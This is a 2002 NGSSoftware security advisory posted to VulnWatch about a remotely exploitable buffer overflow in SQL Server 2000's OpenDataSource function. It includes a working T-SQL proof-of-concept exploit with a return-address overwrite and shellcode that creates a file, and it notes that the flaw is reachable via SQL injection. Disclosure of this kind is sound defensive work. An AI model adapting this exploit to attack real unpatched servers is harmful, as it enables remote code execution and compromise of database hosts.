From nisr@nextgenss.com Thu Jun 20 02:47:03 2002 From: NGSSoftware Insight Security Research To: vulnwatch@vulnwatch.org Date: Wed, 19 Jun 2002 14:52:08 +0100 Subject: [VulnWatch] Microsoft SQL Server 2000 OpenDataSource Buffer Overflow (#NISR19062002) [The following text is in the "iso-8859-1" character set] [Your display is set for the "US-ASCII" character set] [Some characters may be displayed incorrectly] NGSSoftware Insight Security Research Advisory Name: OpenDataSource Buffer Overflow Systems: Microsoft SQL Server 2000, all Service Packs Severity: High Risk Category: Remote Buffer Overrun Vulnerability Vendor URL: http://www.microsoft.com/ Author: Mark Litchfield (mark@ngssoftware.com) Contributor: David Litchfield (david@ngssoftware.com) Advisory URL: http://www.ngssoftware.com/advisories/mssql-ods.txt Date: 19th June 2002 Advisory number: #NISR19062002 VNA reference : http://www.ngssoftware.com/vna/ms-sql.txt This advisory covers the solution to one of the problems mentioned in the above VNA URL. Description *********** Microsoft's database server SQL Server 2000 has a remotely exploitable buffer overrun vulnerability in the OpenDataSource function when combined with the MS Jet Engine. Due to this being a JET problem other products may also be vulnerable; however the fix for all products should be the same. Please see the "Fix Information" section for more details. Details ******* By making a specially crafted SQL query using the OpenDataSource function it is possible to overflow a buffer in the SQL Server process, gaining control of its execution remotely. If the SQL Server is running with SYSTEM privileges, this is default behaviour, then any code supplied by the attacker in an exploit of the overflow will run uninhibited. Whilst the overflow is UNICODE in nature, as will be shown, it is still very easy to exploit. What must be stressed is that this may be launched via a web server application if it is vulnerable to SQL Injection so just because no direct access can be gained to the SQL Server from the Internet does not mean it is safe. All customers running SQL Server should check their patch level. Simple Proof of Concept *********************** This Transact SQL Script will create a file called "SQL-ODSJET-BO" on the root of the C: drive on Windows 2000 SP 2 machines -------8<--------- -- Simple Proof of Concept -- Exploits a buffer overrun in OpenDataSource() -- -- Demonstrates how to exploit a UNICODE overflow using T-SQL -- Calls CreateFile() creating a file called c:\SQL-ODSJET-BO -- I'm overwriting the saved return address with 0x42B0C9DC -- This is in sqlsort.dll and is consistent between SQL 2000 SP1 and SP2 -- The address holds a jmp esp instruction. -- -- To protect against this overflow download the latest Jet Service -- pack from Microsoft - http://www.microsoft.com/ -- -- David Litchfield (david@ngssoftware.com) -- 19th June 2002 declare @exploit nvarchar(4000) declare @padding nvarchar(2000) declare @saved_return_address nvarchar(20) declare @code nvarchar(1000) declare @pad nvarchar(16) declare @cnt int declare @more_pad nvarchar(100) select @cnt = 0 select @padding = 0x41414141 select @pad = 0x4141 while @cnt < 1063 begin select @padding = @padding + @pad select @cnt = @cnt + 1 end -- overwrite the saved return address select @saved_return_address = 0xDCC9B042 select @more_pad = 0x4343434344444444454545454646464647474747 -- code to call CreateFile(). The address is hardcoded to 0x77E86F87 - Win2K Sp2 -- change if running a different service pack select @code = 0x558BEC33C05068542D424F6844534A4568514C2D4F68433A5C538D142450504050485050B0 C05052B8876FE877FFD0CCCCCCCCCC select @exploit = N'SELECT * FROM penDataSource( ''Microsoft.Jet.OLEDB.4.0'',''Data Source="c:\' select @exploit = @exploit + @padding + @saved_return_address + @more_pad + @code select @exploit = @exploit + N'";User ID=Admin;Password=;Extended properties=Excel 5.0'')...xactions' exec (@exploit) ------->8--------- Fix Information *************** NGSSoftware alerted Microsoft to this problem on the 16th of May 2002 and after investigation Microsoft recommend that customers should upgrade their version of Jet. The latest version is available from here: http://www.microsoft.com/windows2000/downloads/recommended/q282010/default.a sp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D38002%26area%3Dsearc h%26ordinal%3D2%26redirect%3Dno A check for this vulnerability has been added to Typhon II, NGSSoftware's vulnerability assessment scanner, of which, more information is available from the NGSSite, http://www.ngssoftware.com/ Further Information ******************** For more information regarding SQL Injection please read http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf http://www.ngssoftware.com/papers/advanced_sql_injection.pdf and for more information about buffer overflows please read http://www.ngssoftware.com/papers/ntbufferoverflow.html http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf http://www.ngssoftware.com/papers/unicodebo.pdf http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf